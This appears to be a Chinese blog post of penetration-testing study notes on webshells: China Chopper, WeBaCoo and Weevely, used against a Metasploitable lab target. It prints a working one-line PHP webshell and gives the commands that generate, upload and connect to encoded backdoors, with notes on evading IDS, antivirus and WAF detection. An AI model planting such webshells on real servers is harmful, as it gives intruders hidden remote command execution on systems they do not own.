zoukankan      html  css  js  c++  java
  • 小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)

    webshell

    本质:<?php echo shell_exec($_GET['cmd']);?>

    windows平台

    中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】

    1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】

    使用ssh连接metasploitable

    创建包含木马代码的文件

    2、连接相应的服务器端

    添加服务器端URL  【密码为一句话木马中的参数】

    双击进入文件管理界面

     

    也可以进入命令行模式【虚拟终端】  {权限只为web程序的运行权限}

    可能被IDS、AV、WAF、扫描器软件发现查杀  【可编码免杀】

    kali平台下的webshell,本质与中国菜刀类似,有编码功能,可避免被查杀

    WeBaCoo(Web Backdoor Cookie)【只对PHP】

    获取的是类终端的shell

    编码通信内容通过cookie头传输,隐蔽性较强

    参数:

    cm:base64编码的命令

    cn:服务器用于返回数据的cookie头的名

    cp:返回信息定界符

    1、生成服务器端

    wenacoo -g -o a.php

    ##利用scp上传到metaspolitable的服务器根目录

    移动webacoo.php到web根目录

    2、使用客户端进行连接

    webacoo -t -u http://1.1.1.1/a.php

    ##抓包分析如何通过cookie头传指令,手动触发流量  【cm/cn/cp】

     其他参数

    webacoo -h

    Weevely  【使用http头进行指令(经过编码)传输】

    隐蔽的类终端PHP Webshell

    有30多个管理模块

    执行系统命令、浏览文件系统

    检查服务器常见配置错误

    创建正向、反向TCP Shell连接

    通过目标计算机代理HTTP流量

    从目标计算机运行端口扫描,渗透内网

     支持连接密码

    *****************************************************************

    ##kali中缺少库

    https://pypi.python.org/pypi/PySocks/  【下载库文件压缩包】

    ./setup.py install

    **************************************************************************************** 

     1、生成服务端  【生成经过编码的木马】

    weevely generate <password> <path>

     

    ##上传木马

     2、连接客户端

    weevely <URL> <password> [cmd]

     

     3、模块

    help

     

  • 相关阅读:
    高精度A+B
    基本定积分求面积
    二进制算子集和
    linux命令
    Dubbo
    java 集合区别
    Java中Comparable和Comparator区别
    synchronized实现原理
    ThreadLocal 原理
    java volatile关键字
  • 原文地址:https://www.cnblogs.com/zixuanfy/p/6079726.html
Copyright © 2011-2022 走看看